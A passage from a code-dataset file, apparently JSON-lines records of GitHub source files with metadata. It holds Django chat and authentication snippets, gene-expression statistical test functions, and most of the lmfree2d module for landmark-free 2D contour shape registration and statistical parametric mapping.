user=self.user,\n message=message,\n block_thread=self.private_block_chat_name\n )\n\n def private_block_message(self, event):\n self.send(text_data=json.dumps(event))\n", "repo_name": "edfolmi/candlechat", "sub_path": "chat/block_private_consumers.py", "file_name": "block_private_consumers.py", "file_ext": "py", "file_size_in_byte": 1784, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "channels.generic.websocket.WebsocketConsumer", "line_number": 9, "usage_type": "name"}, {"api_name": "asgiref.sync.async_to_sync", "line_number": 23, "usage_type": "call"}, {"api_name": "asgiref.sync.async_to_sync", "line_number": 29, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "asgiref.sync.async_to_sync", "line_number": 41, "usage_type": "call"}, {"api_name": "models.PrivateBlock.objects.create", "line_number": 50, "usage_type": "call"}, {"api_name": "models.PrivateBlock.objects", "line_number": 50, "usage_type": "attribute"}, {"api_name": "models.PrivateBlock", "line_number": 50, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "1654109552", "text": "from django.urls import path, include\nfrom .views import RegistrationAPIView, LoginAPIView, UserRetrieveUpdateAPIView\n\n\nurlpatterns = [\n # 회원가입\n path('register/', RegistrationAPIView.as_view()),\n # 로그인\n path('login/', LoginAPIView.as_view()), \n # 회원정보\n path('update/', UserRetrieveUpdateAPIView.as_view())\n]", "repo_name": "kinzinzz/DRF_STUDY", "sub_path": "drf_jwt/api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 350, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.RegistrationAPIView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.RegistrationAPIView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.LoginAPIView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.LoginAPIView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.UserRetrieveUpdateAPIView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.UserRetrieveUpdateAPIView", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "13619791701", "text": "import statistics\nimport sys\nfrom tqdm import tqdm\nfrom scipy import stats\nimport numpy as np\n\n\ndef remove_genes_with_median_0(data_frame):\n \"\"\"\n Description: Removes the genes for which the median calculated\n on all patients (normal + tumor) is = 0\n :param data_frame: data frame containing gene expression data\n :return data_frame: data frame after removing genes with median = 0\n :return removed_genes: removed genes names\n \"\"\"\n removed_genes = []\n for gene in tqdm(data_frame.columns, desc=\">> Compute median for each gene...\", file=sys.stdout):\n median = statistics.median(data_frame[gene])\n if median == 0:\n removed_genes.append(gene)\n\n data_frame = data_frame.drop(columns=removed_genes)\n return data_frame, removed_genes\n\n\ndef mann_whitney_u_test(data_frame_0, data_frame_1, alpha):\n \"\"\"\n Description: Non-parametric statistical test\n :param data_frame_0: data frame containing gene expression 
values of normal patients\n :param data_frame_1: data frame containing gene expression values of tumor patients\n :param alpha:\n :return m_reduced_genes: differentially expressed genes in normal and tumor samples\n \"\"\"\n m_reduced_genes = []\n\n for gene in tqdm(data_frame_0.columns, desc=\">> Computing test for each gene...\", file=sys.stdout):\n statistic, pvalue = stats.mannwhitneyu(data_frame_0[gene].tolist(), data_frame_1[gene].tolist())\n if pvalue < alpha / len(data_frame_0.columns): # Bonferroni adjustment\n m_reduced_genes.append(gene)\n\n return m_reduced_genes\n\n\ndef welch_t_test(data_frame_0, data_frame_1, alpha):\n \"\"\"\n Description: Parametric statistical test\n :param data_frame_0: data frame containing gene expression values of normal patients\n :param data_frame_1: data frame containing gene expression values of tumor patients\n :param alpha:\n :return dict_: dictionary containing:\n - genes_b: differentially expressed genes in normal and tumor samples (with bonferroni adjustment)\n - genes: differentially expressed genes in normal and tumor samples\n - p_values_b: p values (bonferroni)\n - t_values_b: t values (bonferroni)\n - all_p_values: all p values\n - all_t_values: all t values\n \"\"\"\n\n dict_ = {\n 'genes_b': [], # genes_bonferroni\n 'genes': [],\n 'p_values_b': [], # pvalues bonferroni\n 't_values_b': [], # tvalues bonferroni\n 'all_p_values': [],\n 'all_t_values': []\n }\n\n for gene in tqdm(data_frame_0.columns, desc=\">> Computing test for each gene...\", file=sys.stdout):\n tvalue, pvalue = stats.ttest_ind(np.array(data_frame_0[gene].tolist()),\n np.array(data_frame_1[gene].tolist()),\n equal_var=False, nan_policy='omit')\n\n if not np.isnan(pvalue) and pvalue < alpha:\n dict_['genes'].append(gene)\n\n if not np.isnan(pvalue) and pvalue <= alpha / len(data_frame_0.columns):\n dict_['genes_b'].append(gene)\n dict_['p_values_b'].append(pvalue)\n dict_['t_values_b'].append(tvalue)\n\n dict_['all_p_values'].append(pvalue)\n dict_['all_t_values'].append(tvalue)\n\n return dict_\n\n\ndef is_float(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n", "repo_name": "Sylelil/Bioinformatics_project", "sub_path": "src/genes/features_selection_method/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 3408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tqdm.tqdm", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 17, "usage_type": "attribute"}, {"api_name": "statistics.median", "line_number": 18, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 36, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "scipy.stats.mannwhitneyu", "line_number": 37, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 37, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 68, "usage_type": "attribute"}, {"api_name": "scipy.stats.ttest_ind", "line_number": 69, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 76, "usage_type": "call"}]} +{"seq_id": 
"5854759689", "text": "\n'''\nlmfree2d:\nA collection of functions for conducting landmark-free statistical analysis\nof 2D contours shapes.\n\nModule containing functions used across scripts.\n\nThis is the only module in this repository. All other PY files are scripts.\n\nPlease cite the following paper:\n\nPataky TC, Yagi M, Ichihashi N, Cox PG (2021). Automated, landmark-free,\nparametric hypothesis tests regarding two-dimensional contour shapes using\ncoherent point drift registration and statistical parametric mapping.\nPeerJ Comp Sci 7:e542.\n\nhttps://doi.org/10.7717/peerj-cs.542\n'''\n\n__version__ = '0.1.1' #2021-08-27\n\nimport os,unipath\nfrom functools import wraps\nimport numpy as np\nimport scipy.spatial\nfrom matplotlib import pyplot as plt\nfrom geomdl import fitting\nimport networkx as nx\nimport pycpd\nfrom sklearn.neighbors import NearestNeighbors\nimport spm1d\n\n\n\n# the following RGB colors are used in various figures and plotting functions\ncolors = np.array([\n\t[177,139,187],\n\t[166,154,196],\n\t[132,118,181],\n\t[225,215,231],\n\t[252,227,205],\n\t[231,179,159],\n\t[213,160,104],\n\t[166,198,226],\n\t[134,167,202],\n ]) / 255\n\n\n\nclass _skip_template(object):\n\t'''\n\tDecorator class for skipping a template array.\n\t\n\tFor a function call \"g = f(a, b)\", where a and b are NumPy arrays,\n\tthis decorator will cause the function to skip processing and return b,\n\tif a and b are the same.\n\t'''\n\n\tdef __init__(self, f):\n\t\tself.f = f\n\n\tdef __call__(self, r, *args, **kwargs):\n\t\tif np.array_equal(r, args[0]):\n\t\t\tr1 = r.copy()\n\t\telse:\n\t\t\tr1 = self.f(r, *args, **kwargs)\n\t\treturn r1\n\n\n\nclass _process_mulitple_contours(object):\n\t'''\n\tDecorator class for skipping a template array.\n\t\n\tFor a function call \"g = f(a)\", where a is a NumPy array,\n\tthis decorator will cause the function to process all elements along\n\tthe first dimension of a, if a is not a 2D array.\n\t\n\tNotes:\n\t- If a is a 2D array, this decorator will not have any effect.\n\t- Otherwise this decorator will cause the function to iteratively\n\t process all 2D arrays: a[0], a[1], ...\n\t'''\n\n\tdef __init__(self, f):\n\t\tself.f = f\n\n\tdef __call__(self, r, *args, **kwargs):\n\t\tif r.ndim in [1,3]:\n\t\t\tr1 = np.array([self.f(rr, *args, **kwargs) for rr in r])\n\t\telse:\n\t\t\tr1 = self.f(r, *args, **kwargs)\n\t\treturn r1\n\n\n\ndef _pvalue2str(p, latex=False):\n\t'''\n\tConvert a probability value to a string.\n\t\n\t- If p is less than 0.001, \"< 0.001\" will be returned.\n\t- Otherwise p will be formatted to 3 decimal points\n\t'''\n\t\n\tif latex:\n\t\ts = r'$p < 0.001$' if (p < 0.001) else (r'$p = %.3f$' %p)\n\telse:\n\t\ts = '< 0.001' if (p<0.001) else '%.3f' %p\n\treturn s\n\n\n\nclass TwoSampleSPMResults(object):\n\t'''\n\tClass continaing statistical results for two-sample tests\n\t\n\tAttributes:\n\t\n\t* alpha : Type I error rate\n\t* m0 : mean contour for first group\n\t* m1 : mean contour for second group\n\t* p : probability of observing the given z_max value, if m0=m1, given the underlying shape variance\n\t* z : test statistic values (one for each contour point)\n\t* zc : critical test statistic value at alpha\n\t\n\tProperties:\n\t\n\t* T2_critical : (same as \"zc\")\n\t* T2_max : (same as \"z_max\")\n\t* n : number of contour points\n\t* npoints : (same as \"n\")\n\t* z_crticial: (same as \"zc\")\n\t* z_max : maximum test statistic value\n\t* zi: test statistic values, thresholded at zc\n\t\n\tMethods:\n\t\n\t* plot : plot the 
results including mean shapes, excursion set and p value\n\t* write_csv : write all attributes to CSV file\n\t'''\n\t\n\tdef __init__(self, m0, m1, z, alpha, zcrit, p):\n\t\tself.m0 = m0\n\t\tself.m1 = m1\n\t\tself.z = z\n\t\tself.alpha = alpha\n\t\tself.zc = zcrit\n\t\tself.p = p\n\t\n\tdef __repr__(self):\n\t\ts = 'TwoSampleSPMResults\\n'\n\t\ts += ' npoints = %d\\n' %self.n\n\t\ts += ' T2_max = %.3f\\n' %self.z_max\n\t\ts += '----- Inference -----\\n'\n\t\ts += ' alpha = %.3f\\n' %self.alpha\n\t\ts += ' T2_critical = %.3f\\n' %self.zc\n\t\ts += ' p = %s\\n' %_pvalue2str(self.p)\n\t\treturn s\n\t\n\t@property\n\tdef T2_critical(self):\n\t\treturn self.zc\n\t@property\n\tdef T2_max(self):\n\t\treturn self.z.max()\n\t@property\n\tdef n(self):\n\t\treturn self.z.size\n\t@property\n\tdef npoints(self):\n\t\treturn self.n\n\t@property\n\tdef z_critical(self):\n\t\treturn self.zc\n\t@property\n\tdef z_max(self):\n\t\treturn self.z.max()\n\t@property\n\tdef zi(self):\n\t\tzi = self.z.copy()\n\t\tzi[self.z < self.zc] = np.nan\n\t\treturn zi\n\t\n\tdef plot(self, ax=None, offset=(0,0), poffset=(0,0), fc='0.65', ec='k', vmin=None, vmax=None):\n\t\t'''\n\t\tPlot statistical results.\n\t\n\t\tBelow \"m0\" and \"m1\" are the mean shapes for the first and second groups, respectively.\n\n\t\tArguments:\n\n\t\t* ax : a Matplotlib axes object (default: plt.gca() )\n\t\t* offset : position offset for mean shapes\n\t\t* poffset : position offset for p value text (relative to m0 centroid)\n\t\t* fc : face color for m0\n\t\t* ec : edge color for m1\n\t\t* vmin : minimum color value for excursion set (values below vmin will have the same color as vmin)\n\t\t* vmax : maximum color value for excursion set (values above vmax will have the same color as vmax)\n\t\t'''\n\t\tax = plt.gca() if (ax is None) else ax\n\t\tassert isinstance(ax, plt.Axes), '\"ax\" must be a Matplotlib Axes object'\n\t\tx0,y0 = (self.m0 + offset).T\n\t\tx1,y1 = (self.m1 + offset).T\n\t\tax.fill(x0, y0, color=fc, zorder=0)\n\t\tax.fill(x1, y1, edgecolor=ec, fill=False, zorder=1)\n\t\t# plot suprathreshold points:\n\t\tif np.any( self.z > self.zc ):\n\t\t\tax.scatter(x1, y1, s=30, c=self.zi, cmap='hot', edgecolor='k', vmin=vmin, vmax=vmax, zorder=2, label='Suprathreshold Points')\n\t\t# add p value as text:\n\t\tpxo,pyo = poffset\n\t\tax.text(x0.mean()+pxo, y0.mean()+pyo, _pvalue2str(self.p, latex=True), ha='center', size=12)\n\t\tax.axis('equal')\n\t\tax.axis('off')\n\n\tdef plot_with_all_contours(self, contoursA, contoursB, ax=None, offset=(0,0), poffset=(0,0), fc='0.65', ec='k', vmin=None, vmax=None):\n\t\t'''\n\t\tPlot statistical results.\n\t\n\t\tBelow \"m0\" and \"m1\" are the mean shapes for the first and second groups, respectively.\n\n\t\tArguments:\n\n\t\t* ax : a Matplotlib axes object (default: plt.gca() )\n\t\t* offset : position offset for mean shapes\n\t\t* poffset : position offset for p value text (relative to m0 centroid)\n\t\t* fc : face color for m0\n\t\t* ec : edge color for m1\n\t\t* vmin : minimum color value for excursion set (values below vmin will have the same color as vmin)\n\t\t* vmax : maximum color value for excursion set (values above vmax will have the same color as vmax)\n\t\t'''\n\t\tax = plt.gca() if (ax is None) else ax\n\t\tassert isinstance(ax, plt.Axes), '\"ax\" must be a Matplotlib Axes object'\n\t\tx0,y0 = (self.m0 + offset).T\n\t\tx1,y1 = (self.m1 + offset).T\n\t\tax.fill(x0, y0, color=fc, zorder=0)\n\t\t# plot contours and their mean:\n\t\tc0,c1 = '0.2', colors[5]\n\t\tfor contours,color in zip([contoursA,contoursB], [c0,c1]):\n\t\t\tcontours += offset\n\t\t\tfor r in contours:\n\t\t\t\tr = np.vstack( [ r , r[0] ] )\n\t\t\t\tax.plot(r[:,0], r[:,1], color=color, lw=0.5, zorder=0)\n\t\t\tm = contours.mean(axis=0)\n\t\t\tax.plot(m[:,0], m[:,1], color=color, lw=3, zorder=1)\n\t\t# plot suprathreshold points:\n\t\tif np.any( self.z > self.zc ):\n\t\t\tax.scatter(x1, y1, s=30, c=self.zi, cmap='hot', edgecolor='k', vmin=vmin, vmax=vmax, zorder=2, label='Suprathreshold Points')\n\t\t# add p value as text:\n\t\tpxo,pyo = poffset\n\t\tax.text(x0.mean()+pxo, y0.mean()+pyo, _pvalue2str(self.p, latex=True), ha='center', size=12)\n\t\tax.axis('equal')\n\t\tax.axis('off')\n\t\n\tdef write_csv(self, fname):\n\t\t'''\n\t\tWrite results to CSV file.\n\t\t\n\t\tArguments:\n\t\t\n\t\t* fname : file name (use a \".csv\" extension)\n\t\t'''\n\t\twith open(fname, 'w') as f:\n\t\t\tf.write('Two Sample SPM Results\\n')\n\t\t\tf.write('alpha = %.3f\\n' %self.alpha)\n\t\t\tf.write('T2_critical = %.3f\\n' %self.zc)\n\t\t\tf.write('p = %.3f\\n' 
%self.p)\n\t\t\tf.write('X0,Y0,X1,Y1,T2\\n')\n\t\t\tfor (x0,y0),(x1,y1),zz in zip(self.m0, self.m1, self.z):\n\t\t\t\tf.write('%.6f,%.6f,%.6f,%.6f,%.3f\\n' %(x0,y0,x1,y1,zz))\n\n\n\n@_process_mulitple_contours\n@_skip_template\ndef corresp_roll(r, r_template):\n\t'''\n\tFind contour point correspondence using a simple optimal roll search.\n\t\n\tNotes: \n\t\n\t* Below the variables (m,n) represent the number of shapes and number of contour points, respectively.\n\t* All shapes must have the same n.\n\t* Below the terms \"source\" and \"template\" refer to changing and non-changing contours, respectfully.\n\t\n\t\n\tInputs:\n\t\n\t* r : a single source contour as an (n,2) array or multiple source contours as an (m,n,2) array\n\t* r_template : the template contour as an (n,2) array\n\t\n\tOutputs:\n\t\n\t* Optimally rolled contour(s) with same array shape as r\n\t'''\n\tf = [sse(r_template, np.roll(r, i, axis=0) ) for i in range(r.shape[0])]\n\ti = np.argmin(f)\n\treturn np.roll(r, i, axis=0)\n\n\n\ndef get_repository_path():\n\t'''\n\tReturn the respoitory path relative to this file (lmfree2d.py).\n\t\n\tThe repository path is the parent of the directory in which this file is saved.\n\t'''\n\treturn unipath.Path( os.path.dirname(__file__) ).parent\n\n\n\ndef get_shape_with_most_points(r):\n\t'''\n\tReturn the contour shape that has the largest number of points.\n\t\n\tIf there are multiple shapes with the same (maximum) number of points, the first will be returned.\n\t\n\tInputs:\n\t\n\t*r* : multiple contour shapes as an (m,) array or m-length list of (n,2) contour shapes\n\t\n\tOutputs:\n\t\n\t* r_max : an (n,2) array, the element of r that has the most number of points\n\t* n_max : the number of points in r_max\n\t* ind : the index of r_max in r\n\t'''\n\tnpoints = [rr.shape[0] for rr in r]\n\tind = np.argmax(npoints)\n\treturn r[ind], max(npoints), ind\n\n\n\n@_process_mulitple_contours\ndef order_points_clockwise(r, clockwise=True):\n\t'''\n\tOrder a set of 2D points clockwise (default) or counterclockwise along the contour.\n\t\n\tNotes:\n\t\n\t* The points must be ordered before using this function.\n\t* This function will only check the CW/CCW point ordering, and reverse the ordering if necessary\n\t* See \"reorder_points\" for ordering a set of unordered points.\n\t\n\tInputs:\n\t\n\t* r : a single contour as an (n,2) array or multiple contours as an (m,) or (m,n,2) array\n\t* clockwise : bool True=clockwise, False=counterclockwise\n\t\n\tOutputs: \n\t\n\tr_ordered : contour(s) with ordered points, same array shape as r\n\n\tReferences:\n\t\n\t* https://stackoverflow.com/questions/1165647/how-to-determine-if-a-list-of-polygon-points-are-in-clockwise-order\n\t'''\n\tif np.all(r[0] == r[-1]):\n\t\tr = r[:-1]\n\n\tx,y = r.T\n\ts = (x[1:] - x[:-1]) * (y[1:] + y[:-1])\n\ts = s.sum() # s > 0 implies clockwise\n\t# print('Clockwise' if s else 'Counterclockwise')\n\tcw = s > 0\n\tif cw==clockwise:\n\t\tr = r[::-1]\n\treturn r\n\n\n\ndef plot_correspondence(ax, r1, r0, c0=None, c1=None, c2=None):\n\t'''\n\tPlot point correspondence between contour shapes.\n\t\n\tInputs:\n\t\n\t* ax : a Matplotlib axes object (e.g. 
use \"ax = pyplot.axes()\" to create an axes object)\n\t* r1 : one source contour shape as an (n,2) array, or multiple source contour shapes as an (m,) or (m,n,2) array\n\t* r0 : the template contour as an (n,2) array\n\t* c0 : color of template points\n\t* c1 : color of source points\n\t* c2 : color of correspondence lines\n\t'''\n\tdef _plot(ax, r0, r1, c0=None, c1=None, c2=None):\n\t\tc0 = 'k' if (c0 is None ) else c0\n\t\tc1 = colors[0] if (c1 is None ) else c1\n\t\tc2 = colors[2] if (c2 is None ) else c2\n\t\th0 = ax.plot(r0[:,0], r0[:,1], 'o', color=c0, ms=1, zorder=1)[0]\n\t\th1 = ax.plot(r1[:,0], r1[:,1], 'o', color=c1, ms=1, zorder=1)[0]\n\t\th2 = ax.plot(r0[0,0], r0[0,1], 'o', color=c0, mfc='w', mew=2, ms=8, zorder=3)[0]\n\t\th3 = ax.plot(r1[0,0], r1[0,1], 'o', color=c1, mfc='w', mew=2, ms=8, zorder=3)[0]\n\t\tfor (x0,y0),(x1,y1) in zip(r0,r1):\n\t\t\th4 = ax.plot([x0,x1], [y0,y1], '-', color=c2, lw=0.5, zorder=0)[0]\n\t\treturn h0,h1,h2,h3,h4\n\tif r1.ndim == 2:\n\t\th0,h1,h2,h3,h4 = _plot(ax, r1, r0, c0, c1, c2)\n\telse:\n\t\tx,y = np.meshgrid(1.2 + np.arange(5), [1.2,0])\n\t\tfor xx,yy,rr in zip(x.flatten(), y.flatten(), r1):\n\t\t\th0,h1,h2,h3,h4 = _plot(ax, rr+[xx,yy], r0+[xx,yy], c0, c1, c2)\n\tax.axis('equal')\n\tax.axis('off')\n\treturn h0,h1,h2,h3,h4\n\n\n\ndef plot_point_order(ax, r, cmap='jet'):\n\t'''\n\tPlot contour point order using a colormap to specify point order.\n\t\n\tInputs:\n\t\n\t* ax : a Matplotlib axes object (e.g. use \"ax = pyplot.axes()\" to create an axes object)\n\t* r : multiple contour shapes as an (m,) array or m-length list of (n,2) contour shapes\n\t* cmap : colormap name (see Matplotlib colormap documentation)\n\t\n\tReference:\n\t\n\thttps://matplotlib.org/3.1.0/tutorials/colors/colormaps.html\n\t'''\n\tdef _plot(r):\n\t\tax.scatter(r[:,0], r[:,1], c=np.arange(r.shape[0]), cmap=cmap)\n\tif r.ndim == 2:\n\t\t_plot(r)\n\telse:\n\t\tx,y = np.meshgrid( 1.2 * np.arange(5), [1.2,0])\n\t\tfor xx,yy,rr in zip(x.flatten(), y.flatten(), r):\n\t\t\t_plot( rr+[xx,yy] )\n\tax.axis('equal')\n\tax.axis('off')\n\n\n\ndef plot_registration(ax, r, r_template=None):\n\t'''\n\tPlot multiple shapes in an overlapping manner to check registration quality.\n\t\n\tInputs:\n\t\n\t* ax : a Matplotlib axes object (e.g. use \"ax = pyplot.axes()\" to create an axes object)\n\t* r : one contour shape as an (n,2) array, or multiple contour shapes as an (m,) or (m,n,2) array\n\t* r_template : the template contour as an (n,2) array\n\t'''\n\tif r.ndim == 2:\n\t\tr = [r]\n\th0 = [ax.plot(rr[:,0], rr[:,1], 'ko', lw=0.5, zorder=0, ms=2)[0] for rr in r][0]\n\tx,y = None, None\n\tif (r_template is None) and (r.ndim==3):\n\t\tx,y = r.mean(axis=0).T\n\t\tlabel = 'Mean'\n\telse:\n\t\tx,y = r_template.T\n\t\tlabel = 'Template'\n\tif x is not None:\n\t\th1 = ax.plot(x, y, 'ro', ms=8, zorder=1)[0]\n\t\tax.legend([h0,h1], ['Source', label])\n\tax.axis('equal')\n\tax.axis('off')\n\n\n\n@_process_mulitple_contours\ndef random_roll(r):\n\t'''\n\tRandomly roll contour points. Rolling a contour will change its starting point.\n\t\n\tInputs:\n\t\n\t* r : a single contour as an (n,2) array or multiple contours as an (m,) or (m,n,2) array\n\t\n\tOutputs: \n\t\n\tr_rolled : array of rolled contour points, same array shape as r\n\t'''\n\tn = r.shape[0] # number of points\n\ti = np.random.randint(1, n-1)\n\treturn np.roll(r, i, axis=0)\n\n\n\ndef read_csv(filename):\n\t'''\n\tRead contour shapes from a CSV file.\n\t\n\tNotes:\n\t\n\t* The CSV file should have one header row (e.g. 
column labels: Shape, X, Y)\n\t* Starting from the second row, the CSV file must have three columns:\n\t\t* Column 1 : integer label identifying a contour shape\n\t\t* Column 2 : X coordinate of contour point\n\t\t* Column 3 : Y coordinate of contour point\n\t* If all contour shapes have the same number of points (n), an (m,n,2) array will be returned, where m is the number of shapes\n\t* Otherwise an (m,) array will be returned, where each element is an (n,2) array\n\t\n\tInputs:\n\t\n\t* filename : full path to an input CSV file, formatted as described above\n\t\n\tOutputs:\n\t\n\t* r : multiple contours as an (m,) or (m,n,2) array\n\t'''\n\ta = np.loadtxt(filename, delimiter=',', skiprows=1)\n\tshape = np.asarray(a[:,0], dtype=int)\n\txy = np.array( a[:,1:] )\n\treturn np.array( [xy[shape==u] for u in np.unique(shape)] )\n\n\n\ndef read_csv_spm(filename):\n\t'''\n\tRead SPM results from a CSV file.\n\t\n\tNotes:\n\t\n\t* The CSV file is written from the output of \"two_sample_test\". For example:\n\t\n\t\t>>> results = two_sample_test(r0, r1)\n\t\t>>> results.write_csv( 'my_results.csv' )\n\t\n\tInputs:\n\t\n\t* filename : full path to a CSV file that contains results from \"two_sample_test\"\n\t\n\tOutputs:\n\t\n\t* results : TwoSampleSPMResults object (refer to the lmfree2d.TwoSampleSPMResults class definition)\n\t'''\n\twith open(filename, 'r') as f:\n\t\tlines = f.readlines()\n\talpha = float( lines[1].strip().split(' = ')[1] ) \n\tzc = float( lines[2].strip().split(' = ')[1] ) \n\tp = float( lines[3].strip().split(' = ')[1] ) \n\tA = np.array([s.strip().split(',') for s in lines[5:]], dtype=float)\n\tm0 = A[:,:2]\n\tm1 = A[:,2:4]\n\tz = A[:,4]\n\treturn TwoSampleSPMResults(m0, m1, z, alpha, zc, p)\n\n\n\ndef read_landmarks_csv(filename):\n\t'''\n\tRead landmarks from a CSV file.\n\t\n\tNotes:\n\t\n\t* The CSV file should have one header row (e.g. 
column labels: Shape, Landmark, X, Y)\n\t* Starting from the second row, the CSV file must have four columns:\n\t\t* Column 1 : integer label identifying a shape\n\t\t* Column 2 : integer label identifying a landmark\n\t\t* Column 3 : X landmark coordinate\n\t\t* Column 4 : Y landmark coordinate\n\t* All shapes must have the same number of landmarks\n\t\n\tInputs:\n\t\n\t* filename : full path to an input CSV file, formatted as described above\n\t\n\tOutputs:\n\t\n\t* landmarks : (m,n,2) array\n\t'''\n\ta = np.loadtxt(filename, delimiter=',', skiprows=1)\n\tshape = np.asarray(a[:,0], dtype=int)\n\txy = np.array( a[:,2:] )\n\treturn np.array( [xy[shape==u] for u in np.unique(shape)] )\n\n\n\n@_process_mulitple_contours\n@_skip_template\ndef register_cpd(r, r_template):\n\t'''\n\tRegister multiple contours using the Coherent Point Drift (CPD) algorithm.\n\t\n\tNotes: \n\t\n\t* Below the variables (m,n) represent the number of shapes and number of contour points, respectively.\n\t* Below the terms \"source\" and \"template\" refer to changing and non-changing contours, respectively.\n\t* Source shapes do not necessarily have to have the same n.\n\t\n\t\n\tInputs:\n\t\n\t* r : a single source contour as an (n,2) array or multiple source contours as an (m,) or (m,n,2) array\n\t* r_template : the template contour as an (n,2) array\n\t\n\tOutputs:\n\t\n\t* r_reg : registered contour(s) with same array shape as r\n\t\n\tReferences:\n\t\n\t* https://github.com/siavashk/pycpd\n\t* https://siavashk.github.io/2017/05/14/coherent-point-drift/\n\t'''\n\treg = pycpd.RigidRegistration(X=r_template, Y=r)\n\treg.register()\n\tr_reg = reg.TY\n\treturn r_reg\n\n\n\n@_process_mulitple_contours\n@_skip_template\ndef register_procrustes(r, r_template):\n\t'''\n\tRegister multiple contours using a Procrustes fit.\n\t\n\tNotes: \n\t\n\t* Below the variables (m,n) represent the number of shapes and number of contour points, respectively.\n\t* Below the terms \"source\" and \"template\" refer to changing and non-changing contours, respectively.\n\t* Contours do not necessarily have to have the same n.\n\t\n\t\n\tInputs:\n\t\n\t* r : a single source contour as an (n,2) array or multiple source contours as an (m,) or (m,n,2) array\n\t* r_template : the template contour as an (n,2) array\n\t\n\tOutputs:\n\t\n\t* r_reg : registered contour(s) with same array shape as r\n\t\n\tReferences:\n\t\n\thttps://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.procrustes.html\n\t'''\n\tc = r_template.mean(axis=0)\n\ts = np.linalg.norm( r_template - c ) # scale\n\t_,b,_ = scipy.spatial.procrustes(r_template, r)\n\tr1 = s * b + c\n\treturn r1\n\n\n\n@_process_mulitple_contours\ndef reorder_points(points, optimum_order=False, ensure_clockwise=True):\n\t'''\n\tOrder unordered points to form a continuous contour line.\n\t\n\tNotes: \n\t\n\t* Below the variables (m,n) represent the number of shapes and number of contour points, respectively.\n\t* Below the terms \"source\" and \"template\" refer to changing and non-changing contours, respectively.\n\t* Contours do not necessarily have to have the same n.\n\t\n\t\n\tInputs:\n\t\n\t* points : a single source contour as an (n,2) array or multiple source contours as an (m,) or (m,n,2) array\n\t* optimum_order : bool, whether or not to optimally order the points\n\t* ensure_clockwise : bool, whether or not to ensure that the points are ordered clockwise\n\t\n\tOutputs:\n\t\n\t* points_ordered : contour shape(s) with ordered points, same array shape as 
points\n\t\n\tReferences:\n\t\n\thttps://stackoverflow.com/questions/37742358/sorting-points-to-form-a-continuous-line\n\t\n\tAnother option:\n\t\n\txy = np.sort( xy.view('i8,i8'), order=['f1'], axis=0).view(np.float)\n\t\n\thttps://stackoverflow.com/questions/2828059/sorting-arrays-in-numpy-by-column\n\t\n\t'''\n\tpoints = np.asarray(points, dtype=float)\n\tclf = NearestNeighbors(n_neighbors=2, radius=0.05, algorithm='auto', leaf_size=4, metric='minkowski', p=4).fit(points)\n\tG = clf.kneighbors_graph()\n\tT = nx.from_scipy_sparse_matrix(G)\n\torder = list(nx.dfs_preorder_nodes(T, None, None))\n\tif optimum_order:\n\t\tnpoints = points.shape[0]\n\t\tpaths = [list(nx.dfs_preorder_nodes(T, i)) for i in range(npoints)]\n\t\tmindist = np.inf\n\t\tminidx = 0\n\t\tfor i in range( npoints ):\n\t\t\tp = paths[i] # order of nodes\n\t\t\tif len(p) < (0.5 * npoints):\n\t\t\t\tcontinue\n\t\t\tordered = points[p] # ordered nodes\n\t\t\t# find cost of that order by the sum of squared distances between points (i) and (i+1)\n\t\t\tcost = (((ordered[:-1] - ordered[1:])**2).sum(1)).sum()\n\t\t\tif cost < mindist:\n\t\t\t\tmindist = cost\n\t\t\t\tminidx = i\n\t\torder = paths[minidx]\n\tpoints = points[order]\n\tif ensure_clockwise:\n\t\tpoints = order_points_clockwise(points)\n\treturn points\n\n\n\n@_process_mulitple_contours\ndef set_npoints(r, n):\n\t'''\n\tSet the number of contour points.\n\t\n\tNotes: \n\t\n\t* The new contour points are calculated using NURBS interpolation.\n\t* The new contour points will be spaced equally from parametric position 0 to 1 around the contour.\n\t\n\t\n\tInputs:\n\t\n\t* r : a single source contour as an (n,2) array or multiple source contours as an (m,) or (m,n,2) array\n\t* n : int, desired number of contour points\n\t\n\tOutputs:\n\t\n\t* r_new : contour shape(s) with n points, as an (n,2) or (m,n,2) array\n\t\n\tReferences:\n\t\n\thttps://nurbs-python.readthedocs.io/en/latest/module_fitting.html\n\t'''\n\tpcurve = fitting.interpolate_curve(list(r), 3)\n\tpcurve.sample_size = n\n\treturn np.asarray( pcurve.evalpts )\n\n\n\ndef set_matplotlib_rcparams():\n\t'''\n\tSet rc parameters for Matplotlib.\n\t\n\tThis function is needed only if you wish to replicate the paper's figures.\n\t\n\tReferences:\n\t\n\t* 